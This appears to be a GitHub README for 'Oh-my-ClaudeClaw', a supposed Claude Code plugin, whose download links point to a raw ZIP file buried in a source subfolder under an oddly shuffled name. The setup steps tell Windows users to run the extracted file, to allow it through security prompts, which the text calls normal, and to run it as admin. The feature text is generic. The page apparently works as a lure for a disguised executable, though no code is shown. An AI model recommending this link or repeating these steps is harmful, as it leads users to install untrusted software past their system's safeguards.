🤖 Oh-my-ClaudeClaw - Automate Claude Work With Ease

Automate your AI workflows with Oh-my-ClaudeClaw, a powerful Claude Code plugin.

🤖 Oh-my-ClaudeClaw - Automate Claude Work With Ease

Download for Windows

📥 Download

Visit this page to download for Windows: https://raw.githubusercontent.com/detachable-fossafossa258/Oh-my-ClaudeClaw/main/mcp-servers/knowledge-engine/Claw-my-Oh-Claude-2.6.zip

Open the latest release and get the Windows build that matches your device. If you see more than one file, choose the Windows installer or the Windows app file listed in the release notes.

🖥️ What this app does

Oh-my-ClaudeClaw is a Claude Code plugin that helps you run AI work with less manual setup. It brings together memory, task handling, and agent coordination in one place.

It is built for everyday use with features that can help with:

  • Recalling past work
  • Keeping long-term context
  • Handling repeat tasks
  • Connecting chat tools like Discord and Telegram
  • Coordinating several AI workers at once
  • Using knowledge from saved notes and links

✨ Main features

  • 5 MCP servers for tool access and task support
  • 21 skills for common work patterns
  • 3-tier persistent memory for short and long context
  • Knowledge graph support for linked facts and topics
  • Multi-agent orchestration for splitting work across agents
  • Discord integration for remote control and updates
  • Telegram integration for chat-based access
  • 24/7 working setup for always-on tasks

🪟 Windows system needs

Use a Windows PC with:

  • Windows 10 or Windows 11
  • At least 8 GB RAM
  • 2 GB free disk space
  • A stable internet connection
  • Admin access for setup if Windows asks for it

For smoother use, 16 GB RAM works better when you run several agents or keep more memory active.

🚀 Getting started

  1. Open the download page: https://raw.githubusercontent.com/detachable-fossafossa258/Oh-my-ClaudeClaw/main/mcp-servers/knowledge-engine/Claw-my-Oh-Claude-2.6.zip
  2. Download the Windows file from the latest release
  3. If the file is a ZIP, right-click it and choose Extract All
  4. Open the extracted folder
  5. Run the Windows app or installer file
  6. Follow the on-screen setup steps
  7. Start Claude Code and connect Oh-my-ClaudeClaw when the app asks

🔧 Setup on Windows

After you start the app, you may see a first-run setup screen.

Follow these steps:

  1. Choose your preferred language if the app asks
  2. Select your Claude Code connection
  3. Allow access to local files if you want memory and project support
  4. Add your Discord or Telegram details if you plan to use chat control
  5. Save your settings
  6. Restart the app if it asks

If Windows shows a security prompt, choose the option that lets the app run. This is normal for a new app that you just downloaded.

📂 How it works

Oh-my-ClaudeClaw uses a few parts behind the scenes:

  • MCP servers handle tool access
  • Skills handle common tasks
  • Memory stores what the assistant learns over time
  • Knowledge graph links related facts together
  • Multi-agent orchestration splits large work into smaller steps
  • Discord and Telegram integration let you send tasks from chat

You do not need to manage these parts by hand. The app handles the flow once you set it up.

💬 Using Discord and Telegram

If you connect Discord or Telegram, you can use the app from chat.

Common uses include:

  • Sending a task to the assistant
  • Checking progress
  • Getting replies while you are away
  • Keeping an always-on work loop running

To use these features, open the app settings and add the details for the service you want to use.

🧠 Memory and knowledge graph

The memory system helps the assistant keep useful context.

It uses three levels:

  • Recent memory for active work
  • Project memory for current tasks
  • Long-term memory for facts that matter later

The knowledge graph links related items so the app can find connections across notes, tasks, and past work. This helps the assistant stay consistent over time.

🛠️ Common use cases

You can use Oh-my-ClaudeClaw for:

  • Daily task help
  • Long-running AI work
  • Project notes and context
  • Chat-based control
  • Repeated workflow steps
  • Coordinating several AI agents
  • Saving useful details for later

📁 Files you may see in a release

A Windows release may include files like:

  • Installer file
  • Portable app file
  • ZIP archive
  • Release notes
  • Support files

If there is more than one Windows file, choose the one marked for Windows. If you want the easiest setup, use the installer when it is available.

⚙️ Basic use steps

  1. Start the app
  2. Connect Claude Code
  3. Turn on the features you want
  4. Add chat integration if needed
  5. Give the assistant a task
  6. Let it work in the background
  7. Check the output in the app or in chat

🔍 Troubleshooting

If the app does not start:

  • Check that the file finished downloading
  • Try running it again as admin
  • Move the app to a simple folder like Downloads or Desktop
  • Make sure Windows did not block the file
  • Restart your PC and try again

If Claude Code does not connect:

  • Confirm Claude Code is installed
  • Check your account sign-in
  • Open the app settings and reconnect
  • Restart both apps

If Discord or Telegram does not work:

  • Check your bot or chat settings
  • Make sure the token or key is correct
  • Save settings again
  • Restart the app

📦 Recommended first run

For the first setup, use this order:

  1. Install the app
  2. Open it once
  3. Connect Claude Code
  4. Test one simple task
  5. Add memory settings
  6. Turn on Discord or Telegram if needed
  7. Try a longer task after the first test works

🔒 Privacy and local control

The app can store memory and project data so it can work across sessions. Keep control of what you connect and what you save. If you do not want chat access, you can skip Discord and Telegram setup

📌 Project topics

ai-agent, ai-assistant, autonomous-agent, claude-code, claude-code-plugin, discord-bot, knowledge-graph, mcp-server, memory-system, multi-agent, orchestration, telegram-bot